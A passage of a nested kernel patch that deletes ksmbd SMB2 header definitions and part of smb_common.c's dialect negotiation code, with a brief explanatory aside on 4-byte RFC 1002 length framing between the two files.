+- *  command code name for the struct. Note that structures must be packed.
+- *
+- */
+-
+-struct preauth_integrity_info {
+-	/* PreAuth integrity Hash ID */
+-	__le16			Preauth_HashId;
+-	/* PreAuth integrity Hash Value */
+-	__u8			Preauth_HashValue[SMB2_PREAUTH_HASH_SIZE];
+-};
+-
+-/* offset is sizeof smb2_negotiate_rsp but rounded up to 8 bytes. */
+-#ifdef CONFIG_SMB_SERVER_KERBEROS5
+-/* sizeof(struct smb2_negotiate_rsp) =
+- * header(64) + response(64) + GSS_LENGTH(96) + GSS_PADDING(0)
+- */
+-#define OFFSET_OF_NEG_CONTEXT	0xe0
+-#else
+-/* sizeof(struct smb2_negotiate_rsp) =
+- * header(64) + response(64) + GSS_LENGTH(74) + GSS_PADDING(6)
+- */
+-#define OFFSET_OF_NEG_CONTEXT	0xd0
+-#endif
+-
+-#define SMB2_SESSION_EXPIRED		(0)
+-#define SMB2_SESSION_IN_PROGRESS	BIT(0)
+-#define SMB2_SESSION_VALID		BIT(1)
+-
+-#define SMB2_SESSION_TIMEOUT		(10 * HZ)
+-
+-struct create_durable_req_v2 {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	__le32 Timeout;
+-	__le32 Flags;
+-	__u8 Reserved[8];
+-	__u8 CreateGuid[16];
+-} __packed;
+-
+-struct create_durable_reconn_req {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	union {
+-		__u8  Reserved[16];
+-		struct {
+-			__u64 PersistentFileId;
+-			__u64 VolatileFileId;
+-		} Fid;
+-	} Data;
+-} __packed;
+-
+-struct create_durable_reconn_v2_req {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct {
+-		__u64 PersistentFileId;
+-		__u64 VolatileFileId;
+-	} Fid;
+-	__u8 CreateGuid[16];
+-	__le32 Flags;
+-} __packed;
+-
+-struct create_app_inst_id {
+-	struct create_context ccontext;
+-	__u8 Name[8];
+-	__u8 Reserved[8];
+-	__u8 AppInstanceId[16];
+-} __packed;
+-
+-struct create_app_inst_id_vers {
+-	struct create_context ccontext;
+-	__u8 Name[8];
+-	__u8 Reserved[2];
+-	__u8 Padding[4];
+-	__le64 AppInstanceVersionHigh;
+-	__le64 AppInstanceVersionLow;
+-} __packed;
+-
+-struct create_mxac_req {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	__le64 Timestamp;
+-} __packed;
+-
+-struct create_alloc_size_req {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	__le64 AllocationSize;
+-} __packed;
+-
+-struct create_durable_rsp {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	union {
+-		__u8  Reserved[8];
+-		__u64 data;
+-	} Data;
+-} __packed;
+-
+-struct create_durable_v2_rsp {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	__le32 Timeout;
+-	__le32 Flags;
+-} __packed;
+-
+-struct create_mxac_rsp {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	__le32 QueryStatus;
+-	__le32 MaximalAccess;
+-} __packed;
+-
+-struct create_disk_id_rsp {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	__le64 DiskFileId;
+-	__le64 VolumeId;
+-	__u8  Reserved[16];
+-} __packed;
+-
+-/* equivalent of the contents of SMB3.1.1 POSIX open context response */
+-struct create_posix_rsp {
+-	struct create_context ccontext;
+-	__u8    Name[16];
+-	__le32 nlink;
+-	__le32 reparse_tag;
+-	__le32 mode;
+-	/* SidBuffer contain two sids(Domain sid(28), UNIX group sid(16)) */
+-	u8 SidBuffer[44];
+-} __packed;
+-
+-struct smb2_buffer_desc_v1 {
+-	__le64 offset;
+-	__le32 token;
+-	__le32 length;
+-} __packed;
+-
+-#define SMB2_0_IOCTL_IS_FSCTL 0x00000001
+-
+-struct smb_sockaddr_in {
+-	__be16 Port;
+-	__be32 IPv4address;
+-	__u8 Reserved[8];
+-} __packed;
+-
+-struct smb_sockaddr_in6 {
+-	__be16 Port;
+-	__be32 FlowInfo;
+-	__u8 IPv6address[16];
+-	__be32 ScopeId;
+-} __packed;
+-
+-#define INTERNETWORK	0x0002
+-#define INTERNETWORKV6	0x0017
+-
+-struct sockaddr_storage_rsp {
+-	__le16 Family;
+-	union {
+-		struct smb_sockaddr_in addr4;
+-		struct smb_sockaddr_in6 addr6;
+-	};
+-} __packed;
+-
+-#define RSS_CAPABLE	0x00000001
+-#define RDMA_CAPABLE	0x00000002
+-
+-struct network_interface_info_ioctl_rsp {
+-	__le32 Next; /* next interface. zero if this is last one */
+-	__le32 IfIndex;
+-	__le32 Capability; /* RSS or RDMA Capable */
+-	__le32 Reserved;
+-	__le64 LinkSpeed;
+-	char	SockAddr_Storage[128];
+-} __packed;
+-
+-struct file_object_buf_type1_ioctl_rsp {
+-	__u8 ObjectId[16];
+-	__u8 BirthVolumeId[16];
+-	__u8 BirthObjectId[16];
+-	__u8 DomainId[16];
+-} __packed;
+-
+-struct resume_key_ioctl_rsp {
+-	__u64 ResumeKey[3];
+-	__le32 ContextLength;
+-	__u8 Context[4]; /* ignored, Windows sets to 4 bytes of zero */
+-} __packed;
+-
+-struct copychunk_ioctl_req {
+-	__le64 ResumeKey[3];
+-	__le32 ChunkCount;
+-	__le32 Reserved;
+-	__u8 Chunks[1]; /* array of srv_copychunk */
+-} __packed;
+-
+-struct srv_copychunk {
+-	__le64 SourceOffset;
+-	__le64 TargetOffset;
+-	__le32 Length;
+-	__le32 Reserved;
+-} __packed;
+-
+-struct copychunk_ioctl_rsp {
+-	__le32 ChunksWritten;
+-	__le32 ChunkBytesWritten;
+-	__le32 TotalBytesWritten;
+-} __packed;
+-
+-struct file_sparse {
+-	__u8	SetSparse;
+-} __packed;
+-
+-/* FILE Info response size */
+-#define FILE_DIRECTORY_INFORMATION_SIZE       1
+-#define FILE_FULL_DIRECTORY_INFORMATION_SIZE  2
+-#define FILE_BOTH_DIRECTORY_INFORMATION_SIZE  3
+-#define FILE_BASIC_INFORMATION_SIZE           40
+-#define FILE_STANDARD_INFORMATION_SIZE        24
+-#define FILE_INTERNAL_INFORMATION_SIZE        8
+-#define FILE_EA_INFORMATION_SIZE              4
+-#define FILE_ACCESS_INFORMATION_SIZE          4
+-#define FILE_NAME_INFORMATION_SIZE            9
+-#define FILE_RENAME_INFORMATION_SIZE          10
+-#define FILE_LINK_INFORMATION_SIZE            11
+-#define FILE_NAMES_INFORMATION_SIZE           12
+-#define FILE_DISPOSITION_INFORMATION_SIZE     13
+-#define FILE_POSITION_INFORMATION_SIZE        14
+-#define FILE_FULL_EA_INFORMATION_SIZE         15
+-#define FILE_MODE_INFORMATION_SIZE            4
+-#define FILE_ALIGNMENT_INFORMATION_SIZE       4
+-#define FILE_ALL_INFORMATION_SIZE             104
+-#define FILE_ALLOCATION_INFORMATION_SIZE      19
+-#define FILE_END_OF_FILE_INFORMATION_SIZE     20
+-#define FILE_ALTERNATE_NAME_INFORMATION_SIZE  8
+-#define FILE_STREAM_INFORMATION_SIZE          32
+-#define FILE_PIPE_INFORMATION_SIZE            23
+-#define FILE_PIPE_LOCAL_INFORMATION_SIZE      24
+-#define FILE_PIPE_REMOTE_INFORMATION_SIZE     25
+-#define FILE_MAILSLOT_QUERY_INFORMATION_SIZE  26
+-#define FILE_MAILSLOT_SET_INFORMATION_SIZE    27
+-#define FILE_COMPRESSION_INFORMATION_SIZE     16
+-#define FILE_OBJECT_ID_INFORMATION_SIZE       29
+-/* Number 30 not defined in documents */
+-#define FILE_MOVE_CLUSTER_INFORMATION_SIZE    31
+-#define FILE_QUOTA_INFORMATION_SIZE           32
+-#define FILE_REPARSE_POINT_INFORMATION_SIZE   33
+-#define FILE_NETWORK_OPEN_INFORMATION_SIZE    56
+-#define FILE_ATTRIBUTE_TAG_INFORMATION_SIZE   8
+-
+-/* FS Info response  size */
+-#define FS_DEVICE_INFORMATION_SIZE     8
+-#define FS_ATTRIBUTE_INFORMATION_SIZE  16
+-#define FS_VOLUME_INFORMATION_SIZE     24
+-#define FS_SIZE_INFORMATION_SIZE       24
+-#define FS_FULL_SIZE_INFORMATION_SIZE  32
+-#define FS_SECTOR_SIZE_INFORMATION_SIZE 28
+-#define FS_OBJECT_ID_INFORMATION_SIZE 64
+-#define FS_CONTROL_INFORMATION_SIZE 48
+-#define FS_POSIX_INFORMATION_SIZE 56
+-
+-/* FS_ATTRIBUTE_File_System_Name */
+-#define FS_TYPE_SUPPORT_SIZE   44
+-struct fs_type_info {
+-	char		*fs_name;
+-	long		magic_number;
+-} __packed;
+-
+-/*
+- *	PDU query infolevel structure definitions
+- *	BB consider moving to a different header
+- */
+-
+-struct smb2_file_access_info {
+-	__le32 AccessFlags;
+-} __packed;
+-
+-struct smb2_file_alignment_info {
+-	__le32 AlignmentRequirement;
+-} __packed;
+-
+-struct smb2_file_basic_info { /* data block encoding of response to level 18 */
+-	__le64 CreationTime;	/* Beginning of FILE_BASIC_INFO equivalent */
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 Attributes;
+-	__u32  Pad1;		/* End of FILE_BASIC_INFO_INFO equivalent */
+-} __packed;
+-
+-struct smb2_file_alt_name_info {
+-	__le32 FileNameLength;
+-	char FileName[];
+-} __packed;
+-
+-struct smb2_file_stream_info {
+-	__le32  NextEntryOffset;
+-	__le32  StreamNameLength;
+-	__le64 StreamSize;
+-	__le64 StreamAllocationSize;
+-	char   StreamName[];
+-} __packed;
+-
+-struct smb2_file_ntwrk_info {
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;
+-	__le32 Attributes;
+-	__le32 Reserved;
+-} __packed;
+-
+-struct smb2_file_standard_info {
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;
+-	__le32 NumberOfLinks;	/* hard links */
+-	__u8   DeletePending;
+-	__u8   Directory;
+-	__le16 Reserved;
+-} __packed; /* level 18 Query */
+-
+-struct smb2_file_ea_info {
+-	__le32 EASize;
+-} __packed;
+-
+-struct smb2_file_alloc_info {
+-	__le64 AllocationSize;
+-} __packed;
+-
+-struct smb2_file_disposition_info {
+-	__u8 DeletePending;
+-} __packed;
+-
+-struct smb2_file_pos_info {
+-	__le64 CurrentByteOffset;
+-} __packed;
+-
+-#define FILE_MODE_INFO_MASK cpu_to_le32(0x0000100e)
+-
+-struct smb2_file_mode_info {
+-	__le32 Mode;
+-} __packed;
+-
+-#define COMPRESSION_FORMAT_NONE 0x0000
+-#define COMPRESSION_FORMAT_LZNT1 0x0002
+-
+-struct smb2_file_comp_info {
+-	__le64 CompressedFileSize;
+-	__le16 CompressionFormat;
+-	__u8 CompressionUnitShift;
+-	__u8 ChunkShift;
+-	__u8 ClusterShift;
+-	__u8 Reserved[3];
+-} __packed;
+-
+-struct smb2_file_attr_tag_info {
+-	__le32 FileAttributes;
+-	__le32 ReparseTag;
+-} __packed;
+-
+-#define SL_RESTART_SCAN	0x00000001
+-#define SL_RETURN_SINGLE_ENTRY	0x00000002
+-#define SL_INDEX_SPECIFIED	0x00000004
+-
+-struct smb2_ea_info_req {
+-	__le32 NextEntryOffset;
+-	__u8   EaNameLength;
+-	char name[1];
+-} __packed; /* level 15 Query */
+-
+-struct smb2_ea_info {
+-	__le32 NextEntryOffset;
+-	__u8   Flags;
+-	__u8   EaNameLength;
+-	__le16 EaValueLength;
+-	char name[1];
+-	/* optionally followed by value */
+-} __packed; /* level 15 Query */
+-
+-struct create_ea_buf_req {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct smb2_ea_info ea;
+-} __packed;
+-
+-struct create_sd_buf_req {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct smb_ntsd ntsd;
+-} __packed;
+-
+-struct smb2_posix_info {
+-	__le32 NextEntryOffset;
+-	__u32 Ignored;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 DosAttributes;
+-	__le64 Inode;
+-	__le32 DeviceId;
+-	__le32 Zero;
+-	/* beginning of POSIX Create Context Response */
+-	__le32 HardLinks;
+-	__le32 ReparseTag;
+-	__le32 Mode;
+-	/* SidBuffer contains two sids (UNIX user sid(16), UNIX group sid(16)) */
+-	u8 SidBuffer[32];
+-	__le32 name_len;
+-	u8 name[1];
+-	/*
+-	 * var sized owner SID
+-	 * var sized group SID
+-	 * le32 filenamelength
+-	 * u8  filename[]
+-	 */
+-} __packed;
+-
+-/* functions */
+-void init_smb2_1_server(struct ksmbd_conn *conn);
+-void init_smb3_0_server(struct ksmbd_conn *conn);
+-void init_smb3_02_server(struct ksmbd_conn *conn);
+-int init_smb3_11_server(struct ksmbd_conn *conn);
+-
+-void init_smb2_max_read_size(unsigned int sz);
+-void init_smb2_max_write_size(unsigned int sz);
+-void init_smb2_max_trans_size(unsigned int sz);
+-void init_smb2_max_credits(unsigned int sz);
+-
+-bool is_smb2_neg_cmd(struct ksmbd_work *work);
+-bool is_smb2_rsp(struct ksmbd_work *work);
+-
+-u16 get_smb2_cmd_val(struct ksmbd_work *work);
+-void set_smb2_rsp_status(struct ksmbd_work *work, __le32 err);
+-int init_smb2_rsp_hdr(struct ksmbd_work *work);
+-int smb2_allocate_rsp_buf(struct ksmbd_work *work);
+-bool is_chained_smb2_message(struct ksmbd_work *work);
+-int init_smb2_neg_rsp(struct ksmbd_work *work);
+-void smb2_set_err_rsp(struct ksmbd_work *work);
+-int smb2_check_user_session(struct ksmbd_work *work);
+-int smb2_get_ksmbd_tcon(struct ksmbd_work *work);
+-bool smb2_is_sign_req(struct ksmbd_work *work, unsigned int command);
+-int smb2_check_sign_req(struct ksmbd_work *work);
+-void smb2_set_sign_rsp(struct ksmbd_work *work);
+-int smb3_check_sign_req(struct ksmbd_work *work);
+-void smb3_set_sign_rsp(struct ksmbd_work *work);
+-int find_matching_smb2_dialect(int start_index, __le16 *cli_dialects,
+-			       __le16 dialects_count);
+-struct file_lock *smb_flock_init(struct file *f);
+-int setup_async_work(struct ksmbd_work *work, void (*fn)(void **),
+-		     void **arg);
+-void smb2_send_interim_resp(struct ksmbd_work *work, __le32 status);
+-struct channel *lookup_chann_list(struct ksmbd_session *sess,
+-				  struct ksmbd_conn *conn);
+-void smb3_preauth_hash_rsp(struct ksmbd_work *work);
+-bool smb3_is_transform_hdr(void *buf);
+-int smb3_decrypt_req(struct ksmbd_work *work);
+-int smb3_encrypt_resp(struct ksmbd_work *work);
+-bool smb3_11_final_sess_setup_resp(struct ksmbd_work *work);
+-int smb2_set_rsp_credits(struct ksmbd_work *work);
+-bool smb3_encryption_negotiated(struct ksmbd_conn *conn);
+-
+-/* smb2 misc functions */
+-int ksmbd_smb2_check_message(struct ksmbd_work *work);
+-
+-/* smb2 command handlers */
+-int smb2_handle_negotiate(struct ksmbd_work *work);
+-int smb2_negotiate_request(struct ksmbd_work *work);
+-int smb2_sess_setup(struct ksmbd_work *work);
+-int smb2_tree_connect(struct ksmbd_work *work);
+-int smb2_tree_disconnect(struct ksmbd_work *work);
+-int smb2_session_logoff(struct ksmbd_work *work);
+-int smb2_open(struct ksmbd_work *work);
+-int smb2_query_info(struct ksmbd_work *work);
+-int smb2_query_dir(struct ksmbd_work *work);
+-int smb2_close(struct ksmbd_work *work);
+-int smb2_echo(struct ksmbd_work *work);
+-int smb2_set_info(struct ksmbd_work *work);
+-int smb2_read(struct ksmbd_work *work);
+-int smb2_write(struct ksmbd_work *work);
+-int smb2_flush(struct ksmbd_work *work);
+-int smb2_cancel(struct ksmbd_work *work);
+-int smb2_lock(struct ksmbd_work *work);
+-int smb2_ioctl(struct ksmbd_work *work);
+-int smb2_oplock_break(struct ksmbd_work *work);
+-int smb2_notify(struct ksmbd_work *ksmbd_work);
+-
+-/*
+- * Get the body of the smb2 message excluding the 4 byte rfc1002 headers
+- * from request/response buffer.
+- */
+-static inline void *smb2_get_msg(void *buf)
+-{
+-	return buf + 4;
+-}
+-
+-#endif	/* _SMB2PDU_H */
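+
+Aside for readers of the removed ksmbd code: smb2_get_msg() above relies on
+the same framing convention as the get_rfc1002_len()/inc_rfc1001_len()
+helpers removed from smb_common.h further below. Every PDU is preceded by a
+4-byte, big-endian, RFC 1002-style length field of which only the low 24
+bits are meaningful. A minimal stand-alone user-space sketch of that framing
+follows; the names frame_len/frame_body are illustrative, not from this patch.
+
+	#include <stdint.h>
+	#include <string.h>
+	#include <arpa/inet.h>	/* ntohl() */
+
+	/* Low 24 bits of the big-endian length prefix, mirroring
+	 * get_rfc1002_len()'s 0xffffff mask. */
+	static unsigned int frame_len(const void *buf)
+	{
+		uint32_t be;
+
+		memcpy(&be, buf, sizeof(be));
+		return ntohl(be) & 0xffffff;
+	}
+
+	/* Skip the 4-byte framing header to reach the SMB2 header proper,
+	 * the same "+ 4" arithmetic as smb2_get_msg(). */
+	static void *frame_body(void *buf)
+	{
+		return (char *)buf + 4;
+	}
+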
+diff --git a/fs/ksmbd/smb_common.c b/fs/ksmbd/smb_common.c
+deleted file mode 100644
+index 05d7f3e910bf4..0000000000000
+--- a/fs/ksmbd/smb_common.c
++++ /dev/null
+@@ -1,797 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- *   Copyright (C) 2018 Namjae Jeon <linkinjeon@kernel.org>
+- */
+-
+-#include <linux/user_namespace.h>
+-
+-#include "smb_common.h"
+-#include "server.h"
+-#include "misc.h"
+-#include "smbstatus.h"
+-#include "connection.h"
+-#include "ksmbd_work.h"
+-#include "mgmt/user_session.h"
+-#include "mgmt/user_config.h"
+-#include "mgmt/tree_connect.h"
+-#include "mgmt/share_config.h"
+-
+-/*for shortname implementation */
+-static const char basechars[43] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_-!@#$%";
+-#define MANGLE_BASE (sizeof(basechars) / sizeof(char) - 1)
+-#define MAGIC_CHAR '~'
+-#define PERIOD '.'
+-#define mangle(V) ((char)(basechars[(V) % MANGLE_BASE]))
+-
+-struct smb_protocol {
+-	int		index;
+-	char		*name;
+-	char		*prot;
+-	__u16		prot_id;
+-};
+-
+-static struct smb_protocol smb1_protos[] = {
+-	{
+-		SMB21_PROT,
+-		"\2SMB 2.1",
+-		"SMB2_10",
+-		SMB21_PROT_ID
+-	},
+-	{
+-		SMB2X_PROT,
+-		"\2SMB 2.???",
+-		"SMB2_22",
+-		SMB2X_PROT_ID
+-	},
+-};
+-
+-static struct smb_protocol smb2_protos[] = {
+-	{
+-		SMB21_PROT,
+-		"\2SMB 2.1",
+-		"SMB2_10",
+-		SMB21_PROT_ID
+-	},
+-	{
+-		SMB30_PROT,
+-		"\2SMB 3.0",
+-		"SMB3_00",
+-		SMB30_PROT_ID
+-	},
+-	{
+-		SMB302_PROT,
+-		"\2SMB 3.02",
+-		"SMB3_02",
+-		SMB302_PROT_ID
+-	},
+-	{
+-		SMB311_PROT,
+-		"\2SMB 3.1.1",
+-		"SMB3_11",
+-		SMB311_PROT_ID
+-	},
+-};
+-
+-unsigned int ksmbd_server_side_copy_max_chunk_count(void)
+-{
+-	return 256;
+-}
+-
+-unsigned int ksmbd_server_side_copy_max_chunk_size(void)
+-{
+-	return (2U << 30) - 1;
+-}
+-
+-unsigned int ksmbd_server_side_copy_max_total_size(void)
+-{
+-	return (2U << 30) - 1;
+-}
+-
+-inline int ksmbd_min_protocol(void)
+-{
+-	return SMB21_PROT;
+-}
+-
+-inline int ksmbd_max_protocol(void)
+-{
+-	return SMB311_PROT;
+-}
+-
+-int ksmbd_lookup_protocol_idx(char *str)
+-{
+-	int offt = ARRAY_SIZE(smb1_protos) - 1;
+-	int len = strlen(str);
+-
+-	while (offt >= 0) {
+-		if (!strncmp(str, smb1_protos[offt].prot, len)) {
+-			ksmbd_debug(SMB, "selected %s dialect idx = %d\n",
+-				    smb1_protos[offt].prot, offt);
+-			return smb1_protos[offt].index;
+-		}
+-		offt--;
+-	}
+-
+-	offt = ARRAY_SIZE(smb2_protos) - 1;
+-	while (offt >= 0) {
+-		if (!strncmp(str, smb2_protos[offt].prot, len)) {
+-			ksmbd_debug(SMB, "selected %s dialect idx = %d\n",
+-				    smb2_protos[offt].prot, offt);
+-			return smb2_protos[offt].index;
+-		}
+-		offt--;
+-	}
+-	return -1;
+-}
+-
+-/**
+- * ksmbd_verify_smb_message() - check for valid smb2 request header
+- * @work:	smb work
+- *
+- * check for valid smb signature and packet direction (request/response)
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-int ksmbd_verify_smb_message(struct ksmbd_work *work)
+-{
+-	struct smb2_hdr *smb2_hdr = ksmbd_req_buf_next(work);
+-	struct smb_hdr *hdr;
+-
+-	if (smb2_hdr->ProtocolId == SMB2_PROTO_NUMBER)
+-		return ksmbd_smb2_check_message(work);
+-
+-	hdr = work->request_buf;
+-	if (*(__le32 *)hdr->Protocol == SMB1_PROTO_NUMBER &&
+-	    hdr->Command == SMB_COM_NEGOTIATE) {
+-		work->conn->outstanding_credits++;
+-		return 0;
+-	}
+-
+-	return -EINVAL;
+-}
+-
+-/**
+- * ksmbd_smb_request() - check for valid smb request type
+- * @conn:	connection instance
+- *
+- * Return:      true on success, otherwise false
+- */
+-bool ksmbd_smb_request(struct ksmbd_conn *conn)
+-{
+-	__le32 *proto = (__le32 *)smb2_get_msg(conn->request_buf);
+-
+-	if (*proto == SMB2_COMPRESSION_TRANSFORM_ID) {
+-		pr_err_ratelimited("smb2 compression not supported yet");
+-		return false;
+-	}
+-
+-	if (*proto != SMB1_PROTO_NUMBER &&
+-	    *proto != SMB2_PROTO_NUMBER &&
+-	    *proto != SMB2_TRANSFORM_PROTO_NUM)
+-		return false;
+-
+-	return true;
+-}
+-
+-static bool supported_protocol(int idx)
+-{
+-	if (idx == SMB2X_PROT &&
+-	    (server_conf.min_protocol >= SMB21_PROT ||
+-	     server_conf.max_protocol <= SMB311_PROT))
+-		return true;
+-
+-	return (server_conf.min_protocol <= idx &&
+-		idx <= server_conf.max_protocol);
+-}
+-
+-static char *next_dialect(char *dialect, int *next_off, int bcount)
+-{
+-	dialect = dialect + *next_off;
+-	*next_off = strnlen(dialect, bcount);
+-	if (dialect[*next_off] != '\0')
+-		return NULL;
+-	return dialect;
+-}
+-
+-static int ksmbd_lookup_dialect_by_name(char *cli_dialects, __le16 byte_count)
+-{
+-	int i, seq_num, bcount, next;
+-	char *dialect;
+-
+-	for (i = ARRAY_SIZE(smb1_protos) - 1; i >= 0; i--) {
+-		seq_num = 0;
+-		next = 0;
+-		dialect = cli_dialects;
+-		bcount = le16_to_cpu(byte_count);
+-		do {
+-			dialect = next_dialect(dialect, &next, bcount);
+-			if (!dialect)
+-				break;
+-			ksmbd_debug(SMB, "client requested dialect %s\n",
+-				    dialect);
+-			if (!strcmp(dialect, smb1_protos[i].name)) {
+-				if (supported_protocol(smb1_protos[i].index)) {
+-					ksmbd_debug(SMB,
+-						    "selected %s dialect\n",
+-						    smb1_protos[i].name);
+-					if (smb1_protos[i].index == SMB1_PROT)
+-						return seq_num;
+-					return smb1_protos[i].prot_id;
+-				}
+-			}
+-			seq_num++;
+-			bcount -= (++next);
+-		} while (bcount > 0);
+-	}
+-
+-	return BAD_PROT_ID;
+-}
+-
+-int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count)
+-{
+-	int i;
+-	int count;
+-
+-	for (i = ARRAY_SIZE(smb2_protos) - 1; i >= 0; i--) {
+-		count = le16_to_cpu(dialects_count);
+-		while (--count >= 0) {
+-			ksmbd_debug(SMB, "client requested dialect 0x%x\n",
+-				    le16_to_cpu(cli_dialects[count]));
+-			if (le16_to_cpu(cli_dialects[count]) !=
+-					smb2_protos[i].prot_id)
+-				continue;
+-
+-			if (supported_protocol(smb2_protos[i].index)) {
+-				ksmbd_debug(SMB, "selected %s dialect\n",
+-					    smb2_protos[i].name);
+-				return smb2_protos[i].prot_id;
+-			}
+-		}
+-	}
+-
+-	return BAD_PROT_ID;
+-}
+-
+-static int ksmbd_negotiate_smb_dialect(void *buf)
+-{
+-	int smb_buf_length = get_rfc1002_len(buf);
+-	__le32 proto = ((struct smb2_hdr *)smb2_get_msg(buf))->ProtocolId;
+-
+-	if (proto == SMB2_PROTO_NUMBER) {
+-		struct smb2_negotiate_req *req;
+-		int smb2_neg_size =
+-			offsetof(struct smb2_negotiate_req, Dialects);
+-
+-		req = (struct smb2_negotiate_req *)smb2_get_msg(buf);
+-		if (smb2_neg_size > smb_buf_length)
+-			goto err_out;
+-
+-		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
+-		    smb_buf_length)
+-			goto err_out;
+-
+-		return ksmbd_lookup_dialect_by_id(req->Dialects,
+-						  req->DialectCount);
+-	}
+-
+-	proto = *(__le32 *)((struct smb_hdr *)buf)->Protocol;
+-	if (proto == SMB1_PROTO_NUMBER) {
+-		struct smb_negotiate_req *req;
+-
+-		req = (struct smb_negotiate_req *)buf;
+-		if (le16_to_cpu(req->ByteCount) < 2)
+-			goto err_out;
+-
+-		if (offsetof(struct smb_negotiate_req, DialectsArray) - 4 +
+-			le16_to_cpu(req->ByteCount) > smb_buf_length) {
+-			goto err_out;
+-		}
+-
+-		return ksmbd_lookup_dialect_by_name(req->DialectsArray,
+-						    req->ByteCount);
+-	}
+-
+-err_out:
+-	return BAD_PROT_ID;
+-}
+-
+-#define SMB_COM_NEGOTIATE_EX	0x0
+-
+-/**
+- * get_smb1_cmd_val() - get smb command value from smb header
+- * @work:	smb work containing smb header
+- *
+- * Return:      smb command value
+- */
+-static u16 get_smb1_cmd_val(struct ksmbd_work *work)
+-{
+-	return SMB_COM_NEGOTIATE_EX;
+-}
+-
+-/**
+- * init_smb1_rsp_hdr() - initialize smb negotiate response header
+- * @work:	smb work containing smb request
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-static int init_smb1_rsp_hdr(struct ksmbd_work *work)
+-{
+-	struct smb_hdr *rsp_hdr = (struct smb_hdr *)work->response_buf;
+-	struct smb_hdr *rcv_hdr = (struct smb_hdr *)work->request_buf;
+-
+-	/*
+-	 * Remove 4 byte direct TCP header.
+-	 */
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(sizeof(struct smb_hdr) - 4);
+-
+-	rsp_hdr->Command = SMB_COM_NEGOTIATE;
+-	*(__le32 *)rsp_hdr->Protocol = SMB1_PROTO_NUMBER;
+-	rsp_hdr->Flags = SMBFLG_RESPONSE;
+-	rsp_hdr->Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
+-		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
+-	rsp_hdr->Pid = rcv_hdr->Pid;
+-	rsp_hdr->Mid = rcv_hdr->Mid;
+-	return 0;
+-}
+-
+-/**
+- * smb1_check_user_session() - check for valid session for a user
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      0 on success, otherwise error
+- */
+-static int smb1_check_user_session(struct ksmbd_work *work)
+-{
+-	unsigned int cmd = work->conn->ops->get_cmd_val(work);
+-
+-	if (cmd == SMB_COM_NEGOTIATE_EX)
+-		return 0;
+-
+-	return -EINVAL;
+-}
+-
+-/**
+- * smb1_allocate_rsp_buf() - allocate response buffer for a command
+- * @work:	smb work containing smb request
+- *
+- * Return:      0 on success, otherwise -ENOMEM
+- */
+-static int smb1_allocate_rsp_buf(struct ksmbd_work *work)
+-{
+-	work->response_buf = kmalloc(MAX_CIFS_SMALL_BUFFER_SIZE,
+-			GFP_KERNEL | __GFP_ZERO);
+-	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
+-
+-	if (!work->response_buf) {
+-		pr_err("Failed to allocate %u bytes buffer\n",
+-				MAX_CIFS_SMALL_BUFFER_SIZE);
+-		return -ENOMEM;
+-	}
+-
+-	return 0;
+-}
+-
+-static struct smb_version_ops smb1_server_ops = {
+-	.get_cmd_val = get_smb1_cmd_val,
+-	.init_rsp_hdr = init_smb1_rsp_hdr,
+-	.allocate_rsp_buf = smb1_allocate_rsp_buf,
+-	.check_user_session = smb1_check_user_session,
+-};
+-
+-static int smb1_negotiate(struct ksmbd_work *work)
+-{
+-	return ksmbd_smb_negotiate_common(work, SMB_COM_NEGOTIATE);
+-}
+-
+-static struct smb_version_cmds smb1_server_cmds[1] = {
+-	[SMB_COM_NEGOTIATE_EX]	= { .proc = smb1_negotiate, },
+-};
+-
+-static void init_smb1_server(struct ksmbd_conn *conn)
+-{
+-	conn->ops = &smb1_server_ops;
+-	conn->cmds = smb1_server_cmds;
+-	conn->max_cmds = ARRAY_SIZE(smb1_server_cmds);
+-}
+-
+-void ksmbd_init_smb_server(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	__le32 proto;
+-
+-	if (conn->need_neg == false)
+-		return;
+-
+-	proto = *(__le32 *)((struct smb_hdr *)work->request_buf)->Protocol;
+-	if (proto == SMB1_PROTO_NUMBER)
+-		init_smb1_server(conn);
+-	else
+-		init_smb3_11_server(conn);
+-}
+-
+-int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work, int info_level,
+-				      struct ksmbd_file *dir,
+-				      struct ksmbd_dir_info *d_info,
+-				      char *search_pattern,
+-				      int (*fn)(struct ksmbd_conn *, int,
+-						struct ksmbd_dir_info *,
+-						struct ksmbd_kstat *))
+-{
+-	int i, rc = 0;
+-	struct ksmbd_conn *conn = work->conn;
+-	struct user_namespace *user_ns = file_mnt_user_ns(dir->filp);
+-
+-	for (i = 0; i < 2; i++) {
+-		struct kstat kstat;
+-		struct ksmbd_kstat ksmbd_kstat;
